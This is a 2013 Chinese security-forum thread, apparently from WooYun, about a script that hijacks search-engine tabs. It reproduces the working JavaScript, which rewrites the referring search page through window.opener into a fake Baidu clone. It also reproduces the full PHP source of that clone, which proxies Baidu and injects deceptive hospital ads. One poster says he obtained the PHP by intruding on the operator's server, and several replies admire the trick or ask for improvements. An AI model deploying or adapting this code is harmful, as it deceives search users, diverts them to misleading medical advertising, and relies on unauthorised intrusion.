这种牛逼的劫持百度页面的脚本谁有~
苦战 | 2013-05-11 17:28
百度框中输入直接输入www.dfnz.com.cn 点击进去,再看看你的搜索页面
http://www.baidu.com/s?wd=www.dfnz.com.cn
知道是http://www.baidu.com.0088.wzzaoxie.com/ee.js 这个js控制的
但谁有http://www.baidu.com.001.hzwladh.com/ 这个小偷站的源码~
1#
VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wooyun/1/zone/index.php on line 10) | 2013-05-11 17:33
有变化吗?
2#
苦战 | 2013-05-11 17:36
@VIP 好好观察下 好像代码上有个地区判断 可能有的地方看不到 我是chrome浏览器
3#
z7y (我是z7y,我为小胖子代言!!) | 2013-05-11 17:48
@苦战 木有变化啊,亲!
4#
苦战 | 2013-05-11 17:55
@z7y 来远程~
5#
docall (陈公子是也。。。) | 2013-05-11 18:17
这货太牛逼了,不注意真不会发现地址栏的链接被他修改了。日他搞源码。
6#
Cr4zy | 2013-05-11 18:24
进去后让你父窗口跳转了 是这样的吗
7#
piaoye (123) | 2013-05-11 18:25
把来路url跳转了。。牛逼
8#
zsx (?? ?捣乱不犯法) | 2013-05-11 18:33
没有地址判断
相关代码
var a = document.referrer; a = a.toLowerCase(); if (a.indexOf("www.baidu.com/") != -1) { var b = a.replace(/www\.baidu\.com\/.*\?/, 'www.baidu.com.0088.wzzaoxie.com/?'); if (navigator.appName.indexOf("Microsoft") != -1) { window.open(b) } else { if (b != null && b != "") { window.opener.location.href = b } } } else if (a.indexOf("www.sogou.com/") != -1) { var b = a.replace(/www\.sogou\.com\/.*\?/, 'www.baidu.com.0088.wzzaoxie.com/?'); if (navigator.appName.indexOf("Microsoft") != -1) { window.open(b) } else { if (b != null && b != "") window.opener.location.href = b } } else if (a.indexOf("www.soso.com/") != -1) { var b = a.replace(/www\.soso\.com\/.*\?/, 'www.baidu.com.0088.wzzaoxie.com/?'); if (navigator.appName.indexOf("Microsoft") != -1) { window.open(b) } else { if (b != null && b != "") window.opener.location.href = b } } else if (a.indexOf("www.youdao.com/") != -1) { var b = a.replace(/www\.youdao\.com\/.*\?/, 'www.baidu.com.0088.wzzaoxie.com/?'); if (navigator.appName.indexOf("Microsoft") != -1) { window.open(b) } else { if (b != null && b != "") window.opener.location.href = b } } else if (a.indexOf("www.so.com/") != -1) { var b = a.replace(/www\.so\.com\/.*\?/, 'www.baidu.com.0088.wzzaoxie.com/?'); if (navigator.appName.indexOf("Microsoft") != -1) { window.open(b) } else { if (b != null && b != "") window.opener.location.href = b } } else if (a.indexOf("so.360.cn/") != -1) { var b = a.replace(/so\.360\.cn\/.*\?/, 'www.baidu.com.0088.wzzaoxie.com/?'); if (navigator.appName.indexOf("Microsoft") != -1) { window.open(b) } else { if (b != null && b != "") window.opener.location.href = b } }
9#
z7y (我是z7y,我为小胖子代言!!) | 2013-05-11 18:40
牛逼,看懂了,可是我不知道他这样有什么用?
10#
无敌L.t.H (:?门安天京北爱我) | 2013-05-11 18:42
坐等淘宝版
11#
蓝风 (?#知我者謂我心憂 不知我者謂我何求#) | 2013-05-11 19:34
跪下
12#
Reserved | 2013-05-11 21:04
求黑帽::>_<::科普
13#
叽叽歪歪 (?) | 2013-05-11 21:48
涨姿势了
14#
黑匣子 (逼大了,什么都能装下!?() | 2013-05-11 21:50
牛b,
15#
大师哥 | 2013-05-11 21:55
这漏洞我发过不是。。WooYun: 360浏览器的一个安全漏洞
16#
黑匣子 (逼大了,什么都能装下!?() | 2013-05-11 22:01
这个不是小偷程序吧,http://www.soso.com/q?pid=s.idx&cid=s.idx.se&w=www.dfnz.com.cn 照样跳转百度,如果谁把源码再改动成判断相应搜索引擎,并跳转到相应的搜索引擎,就完美了
17#
黑匣子 (逼大了,什么都能装下!?() | 2013-05-11 22:02
这个不是小偷程序吧,http://www.soso.com/q?pid=s.idx&cid=s.idx.se&w=www.dfnz.com.cn 照样跳转百度假地址,如果谁把源码再改动成判断相应搜索引擎,并跳转到相应的搜索引擎(假地址),就完美了
18#
discovery | 2013-05-11 22:32
很吊。
19#
鬼哥 | 2013-05-11 23:50
以前很早就玩过了,,以前baidu没限制 现在有点限制了,IE下不会跳,, 别的浏览器估计会 测试 firefox还会
20#
鬼哥 | 2013-05-12 00:31
@苦战 刚去看了下 已拖下来了。。其实代码很简单。。
21#
苦战 | 2013-05-12 00:45
@鬼哥 @zsx js代码没用 要他的那个百度小偷这样就无声无息~
22#
鬼哥 | 2013-05-12 00:47
@苦战 我就是说那个php拖下来了。把它入侵拖下来了呀。。
23#
苦战 | 2013-05-12 00:49
@鬼哥 来发来 zzrt#vip.qq.com
24#
苦战 | 2013-05-12 00:49
@鬼哥 不是.net 么?
25#
鬼哥 | 2013-05-12 01:06
@苦战 贴上来给大家吧!!
<?php error_reporting(E_ALL ^ E_NOTICE); $add_keyword = ' 福州泌尿专科医院'; $add_condition = '男|精|早|阳|包皮|茎|前列|炎|障碍|淋|感染|龟头|空军|武警|东方|红点|疙瘩|性|梅毒|湿|疹|医院|门诊'; $add_html = '<style type="text/css">*.cell-clear{height:0;line-height:0;font-size:0;clear:both}*.cell-refer{width:0;line-height:0;font-size:0;float:left}*#m319243_wr0 *.canvas{color:#000;font-family:arial}*#m319243_wr0 th,td{font-family:arial}*#m319243_wr0 p,form,ol,ul,li,dl,dt,dd,h3{list-style:none;margin:0;padding:0}*#m319243_wr0 input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*#m319243_wr0 table,img{border:0}*#m319243_wr0 td{font-size:9pt;line-height:18px}*#m319243_wr0 em{font-style:normal;color:#c00}*#m319243_wr0 cite{font-style:normal;color:green}*#m319243_wr0 *.pl_l_ctner{word-wrap:break-word;overflow:hidden;zoom:1}*#m319243_wr0 *.pl_l_title{height:26px;line-height:23px;font-size:16px;text-decoration:underline}*#m319243_wr0 *.pl_l_title em{color:#c00;font-style:normal;text-decoration:underline}*#m319243_wr0 *.pl_l_logo_ctner{width:90px;height:99px;margin-right:2px;padding:2px 2px 0;float:left}*#m319243_wr0 *.pl_l_logo_ctner a{text-decoration:none}*#m319243_wr0 *.pl_l_logo_ctner img{border:0}*#m319243_wr0 *.pl_l_rb_ctner{margin-left:100px}*#m319243_wr0 *.pl_l_description,*.pl_l_official{line-height:19px;font-size:13px}*#m319243_wr0 *.pl_l_official span{color:#008000;font-size:13px}*#m319243_wr0 *.pl_l_official a{color:#666}*#m319243_wr1 *.canvas{color:#000;font-family:arial}*#m319243_wr1 th,td{font-family:arial}*#m319243_wr1 p,form,ol,ul,li,dl,dt,dd,h3{list-style:none;margin:0;padding:0}*#m319243_wr1 input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*#m319243_wr1 table,img{border:0}*#m319243_wr1 td{font-size:9pt;line-height:18px}*#m319243_wr1 em{font-style:normal;color:#c00}*#m319243_wr1 cite{font-style:normal;color:green}*#m319243_wr1 *.pl_columns_block{margin:0;padding:0;overflow:hidden;zoom:1}*#m319243_wr1 *.pl_column_item{font-size:13px;line-height:18px;overflow:hidden;zoom:1;padding:0;margin-top:5px}*#m319243_wr1 *.pl_zbg{float:left;height:15px;margin:1px 4px 0 8px;width:8px}*#m319243_wr1 *.pl_z1{background:#090}*#m319243_wr1 *.pl_z2{background:#d80901}*#m319243_wr1 *.pl_z3{background:#f46600}*#m319243_wr1 *.pl_z4{background:#653599}*#m319243_wr1 *.pl_col_rblock{float:left}*#m319243_wr1 *.pl_col_main{padding-bottom:2px}*#m319243_wr1 *.pl_column_item a{font-size:13px}*#m319243_wr1 *.pl_column_item a.pl_dp_black,*.column_black a.pl_dp_black:visited,a.pl_dp_black:hover{color:black;text-decoration:none}*#m319243_wr1 *.pl_column_item a.pl_dp_black:hover{color:#488048}*#m319243_wr2 *.canvas{color:#000;font-family:arial}*#m319243_wr2 th,td{font-family:arial}*#m319243_wr2 p,form,ol,ul,li,dl,dt,dd,h3{list-style:none;margin:0;padding:0}*#m319243_wr2 input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*#m319243_wr2 table,img{border:0}*#m319243_wr2 td{font-size:9pt;line-height:18px}*#m319243_wr2 em{font-style:normal;color:#c00}*#m319243_wr2 cite{font-style:normal;color:green}*#m319243_wr2 *.pl_links_ctner table{width:100%}*#m319243_wr2 *.pl_links_ctner td{border:1px solid white;padding:1px;height:22px;line-height:22px;text-align:center;background:#d3d1f8}*#m319243_wr2 *.pl_links_ctner a{font-size:13px;text-decoration:underline}</style><div style="padding:0px 0px 20px 0px;" id="m319243_ec_ma_ctner"> <div style="width:540px;padding:0px 0px 0px 0px;"> <div style="width:540px;zoom:1;overflow:hidden;"> <div style="width:540px;float:left;padding:0px 0px 0px 0px;"> <div id="m319243_wr0"> <div class="canvas" id="m319243_wr0_canvas"> <div class="pl_l_ctner"> <div class="pl_l_title"> <a fm="pl" p1="1" title1="" linkid="4879253" is_mainurl="true" target="_blank" href="http://www.fzmn120.cn/?baidusmall">福州泌尿专科医院[官方网站]——福州首家专业男科医院</a> </div> <div class="pl_l_logo_ctner"> <a title1="" p2="1" fm="pl" p1="1" target="_blank" href="http://www.fzmn120.cn/?baidusmall"><img width="90" height="90" src="http://www.baidu.com.0066.wzzaoxie.com/logo.jpg"></a> </div> <div class="pl_l_rb_ctner"> <div class="pl_l_description">福州泌尿专科医院多年来被福州市民誉为福州最好的男科医院,医院专业治疗早泄阳痿,包皮过长,前列腺炎,生殖感染,男性不育等男科疾病,已经成功治愈患者数万例,医院坐落于福州湖东路155号(鼓楼站旁),男科咨询热线:0591-88180000 </div> <div class="pl_l_official"><span>www.fzmn120.cn 2013-5</span> - <a mu="" title1="" p2="7" url="" fm="pl" p1="1" href="http://www.fzmn120.cn/?baidusmall" target="_blank">品牌推广</a> </div> </div> </div> </div> </div> </div> </div> <div style="width:540px;zoom:1;overflow:hidden;"> <div style="width:540px;float:left;padding:0px 0px 0px 0px;"> <div id="m319243_wr1"> <div class="canvas" id="m319243_wr1_canvas"> <div class="pl_columns_block"> <div class="pl_column_item"> <div class="pl_zbg pl_z1"></div> <div class="pl_col_rblock"> <div class="pl_col_main"> <a mu="" title1="" p2="8" url="" fm="pl" p1="1" linkid="4879260" ourl="" target="_blank" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">性功能障碍:早泄、阳痿、勃起障碍、射精异常、性欲异常</a> </div> <a mu="" title1="" p2="9" url="" fm="pl" p1="1" linkid="4879261" class="pl_dp_black" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">告别早泄 选择国际最新技术“可逆性” 提高4-8倍(<font color="#009900">▲</font>点击了解)</a> </div> </div> <div class="pl_column_item"> <div class="pl_zbg pl_z2"></div> <div class="pl_col_rblock"> <div class="pl_col_main"> <a mu="" title1="" p2="10" url="" fm="pl" p1="1" linkid="4879262" ourl="" target="_blank" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">生殖整形:包皮过长、包茎、阴茎延长、阴茎增粗</a> </div> <a mu="" title1="" p2="11" url="" fm="pl" p1="1" linkid="4879263" ourl="" target="_blank" class="pl_dp_black" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">包皮超市-多种先进技术任你选 适合各年龄段 无痛美观(<font color="#D80901">▲</font>点击了解)</a> </div> </div> <div class="pl_column_item"> <div class="pl_zbg pl_z3"></div> <div class="pl_col_rblock"> <div class="pl_col_main"> <a mu="" url="" fm="pl" p1="1" linkid="4879264" target="_blank" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">前列腺疾病:慢性前列腺炎、急性前列腺炎、前列腺增生</a> </div> <a mu="" title1="" p2="13" url="" fm="pl" p1="1" linkid="4879265" ourl="" target="_blank" class="pl_dp_black" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">远离前列腺炎困扰 选择“智源肽” 无痛 效果好(<font color="#F46600">▲</font>点击了解)</a> </div> </div> <div class="pl_column_item"> <div class="pl_zbg pl_z4"></div> <div class="pl_col_rblock"> <div class="pl_col_main"><a mu="" title1="" p2="14" url="" fm="pl" p1="1" linkid="4879266" ourl="" target="_blank" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">性传播疾病:龟头炎、尿道炎、附睾炎、淋病、梅毒、尖锐湿疣、疱疹、阴虱</a> </div><a url="" fm="pl" p1="1" linkid="4879267" ourl="" target="_blank" class="pl_dp_black" href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com">七大技术 彻底告别性传播疾病 杜绝复发(<font color="#653599">▲</font>点击了解)</a> </div> </div> </div> </div> </div> </div> </div> <div style="width:540px;zoom:1;overflow:hidden;"> <div style="width:520px;float:left;padding:14px 20px 0px 0px;"> <div id="m319243_wr2"> <div class="canvas" id="m319243_wr2_canvas"> <div class="pl_links_ctner"> <table cellspacing="0" cellpadding="0" border="0"> <tbody align="left"> <tr> <td style="width:20%"> <a mu="" title1="" p2="17" url="" fm="pl" p1="1" linkid="4879269" ourl="" target="_blank" href="http://www.fzmn120.cn/zt/bsjzds/?baidusmall">早泄</a> </td> <td style="width:20%"> <a mu="" title1="" p2="18" fm="pl" p1="1" linkid="4879270" ourl="" target="_blank" href="http://www.fzmn120.cn/zt/ed/?baidusmall">阳痿</a> </td> <td style="width:20%"> <a mu="" title1="" p2="19" fm="pl" p1="1" linkid="4879271" target="_blank" href="http://www.fzmn120.cn/zt/qlxzyt/?baidusmall">前列腺炎</a> </td> <td style="width:20%"> <a title1="" p2="20" fm="pl" p1="1" linkid="4879272" target="_blank" href="http://www.fzmn120.cn/zt/bphqs/?baidusmall">包皮过长</a> </td> <td style="width:20%"> <a title1="" p2="20" fm="pl" p1="1" linkid="4879272" target="_blank" href="http://www.fzmn120.cn/zt/xcb/?baidusmall">龟头感染</a> </td> </tr> </tbody> </table> </div> </div> </div> </div> </div> </div> <div style="margin-top:10px;"><a href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com" target="_blank"><img border="0" src="http://www.baidu.com.0066.wzzaoxie.com/map.jpg" /></a></div> </div>'; $add_right = '<a href="http://com.zoosnet.net/LR/Chatpre.aspx?id=COM93814468&p=www.baidusmall.com" target="_blank"> <img border="0" src="http://www.baidu.com.0066.wzzaoxie.com/mn.gif"><br/></a><br/>'; if ($_GET['wd']) { $_GET['wd'] = str_replace($add_keyword, '', $_GET['wd']); if (preg_match("~$add_condition~", $_GET['wd'])) { $wd_search = urlencode($_GET['wd'].$add_keyword); }else{ $wd_search = urlencode($_GET['wd']); } $wd_input = htmlspecialchars(trim($_GET['wd'])); $html = file_get_contents("http://www.baidu.com/baidu?pn=$_GET[pn]&wd=$wd_search"); $a = array('action="/s"', 'class="s_ipt"', '<a href="/s?wd='); $b = array('action="?"', "class=\"s_ipt\" value=\"$wd_input\"", '<a href="?wd='); $html = str_replace($a, $b, $html); if (!$_GET['pn']) { $html = str_replace('<div id="content_left">', '<div id="content_left">'.$add_html, $html); $html = preg_replace(array( '~<style>\s*\.ec_pp_f.+?<br/>~s', '~<style>\s*\.EC_blank_link.+?<br/>~s', '~<div id="ec_im_container">.+?<div class="r ec_bdtg">~s', '~<div class="r ec_bdtg">~', ), array('','','<div class="r ec_bdtg">', $add_right.'<div class="r ec_bdtg">'), $html); } }else{ //$html = file_get_contents('http://www.baidu.com/'); //$html = str_replace('action="/s"', 'action="?"', $html); $_GET['wd'] = $add_keyword; $wd_search = urlencode($_GET['wd']); $wd_input = htmlspecialchars(trim($_GET['wd'])); $html = file_get_contents("http://www.baidu.com/baidu?pn=$_GET[pn]&wd=$wd_search"); $a = array('action="/s"', 'class="s_ipt"', '<a href="/s?wd='); $b = array('action="?"', "class=\"s_ipt\" value=\"$wd_input\"", '<a href="?wd='); $html = str_replace($a, $b, $html); if (!$_GET['pn']) { $html = str_replace('<div id="content_left">', '<div id="content_left">'.$add_html, $html); $html = preg_replace(array( '~<style>\s*\.ec_pp_f.+?<br/>~s', '~<style>\s*\.EC_blank_link.+?<br/>~s', '~<div id="ec_im_container">.+?<div class="r ec_bdtg">~s', '~<div class="r ec_bdtg">~', ), array('','','<div class="r ec_bdtg">', $add_right.'<div class="r ec_bdtg">'), $html); } } echo $html;
26#
苦战 | 2013-05-12 01:14
@鬼哥 thk
27#
小E | 2013-05-12 14:30
坑爹啊,我们医院站点也在用这个方法,骗点击。
28#
围剿 | 2013-05-12 15:51
前两天刚打包的一套程序,我没打开lz说的站,我只看下面的评论就知道是哪一种了。哈哈:
29#
汉时明月 (签名正在审核......) | 2013-05-12 21:41
没看明白,搜索没发现异常
30#
discovery | 2013-05-12 22:40
@汉时明月 ie 下不执行的。谷歌之类的webkit引擎才执行
31#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-13 10:09
又是医院……
32#
漠惘 | 2013-05-13 20:46
@核攻击 这么搞百度不会K吗??
33#
汉时明月 (签名正在审核......) | 2013-05-13 20:54
@discovery 谢谢指点,果然如此,牛X啊
留言评论(旧系统):